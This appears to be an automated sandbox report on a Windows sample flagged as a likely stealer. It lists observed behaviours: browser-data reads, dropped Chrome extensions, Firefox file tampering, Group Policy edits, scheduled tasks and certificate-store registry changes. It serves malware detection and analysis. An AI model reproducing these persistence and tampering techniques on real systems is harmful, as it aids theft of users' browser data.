Malware Analysis Report

2025-06-15 19:50

Sample ID 240406-fnl4wsbc5z
Target 106d883758255a2ad087a5134b44276918cbe55d1082864a561c76644891d035
SHA256 106d883758255a2ad087a5134b44276918cbe55d1082864a561c76644891d035
Tags
discovery spyware stealer
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

106d883758255a2ad087a5134b44276918cbe55d1082864a561c76644891d035

Threat Level: Likely malicious

The file 106d883758255a2ad087a5134b44276918cbe55d1082864a561c76644891d035 was found to be: Likely malicious.

Malicious Activity Summary

discovery spyware stealer

Blocklisted process makes network request

Checks computer location settings

Executes dropped EXE

Loads dropped DLL

Checks BIOS information in registry

Reads user/profile data of web browsers

Drops Chrome extension

Drops desktop.ini file(s)

Checks installed software on the system

Drops file in System32 directory

Drops file in Windows directory

Drops file in Program Files directory

Enumerates physical storage devices

Unsigned PE

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Modifies data under HKEY_USERS

Suspicious use of WriteProcessMemory

Creates scheduled task(s)

Enumerates system info in registry

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-04-06 05:01

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-06 05:01

Reported

2024-04-06 05:03

Platform

win10v2004-20231215-en

Max time kernel

92s

Max time network

96s

Command Line

"C:\Users\Admin\AppData\Local\Temp\106d883758255a2ad087a5134b44276918cbe55d1082864a561c76644891d035.exe"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zS4BED.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\rundll32.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zS4BED.tmp\Install.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Reads user/profile data of web browsers

spyware stealer

Checks installed software on the system

discovery

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F3258A5B11F1178F530EE7A0197D8F15 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
File created C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla\ZdAYUvLVhVtfvZJ\zZhIfWQ.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F3258A5B11F1178F530EE7A0197D8F15 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla\ZdAYUvLVhVtfvZJ\zZhIfWQ.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
File created C:\Program Files (x86)\epUZFeichsCPC\MaoGuRf.dll C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
File created C:\Program Files (x86)\epUZFeichsCPC\jafxhIg.xml C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
File created C:\Program Files (x86)\VDiAXGzPiWUn\ArsUktk.dll C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
File created C:\Program Files (x86)\qBvbbKpBU\CoPIfj.dll C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
File created C:\Program Files (x86)\fZHZowTYSgfU2\eCqoOPyISfQjJ.dll C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
File created C:\Program Files (x86)\BxVXPYvVqGWoUZKItHR\fsBGcRk.dll C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
File created C:\Program Files (x86)\qBvbbKpBU\tdfVGAH.xml C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
File created C:\Program Files (x86)\BxVXPYvVqGWoUZKItHR\DXIODRJ.xml C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
File created C:\Program Files (x86)\fZHZowTYSgfU2\aJtOsWq.xml C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\bpJjqbWMDOjxkYrvBb.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\MWViHNuTpmRlpInKg.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\wbeMFPOaxEodGIM.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\BinjFlxHFUMMGNOij.job C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates physical storage devices

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\7zS4BED.tmp\Install.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\7zS4BED.tmp\Install.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{14f6f45c-0000-0000-0000-d01200000000}\MaxCapacity = "14116" C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{14f6f45c-0000-0000-0000-d01200000000} C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\SysWOW64\rundll32.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
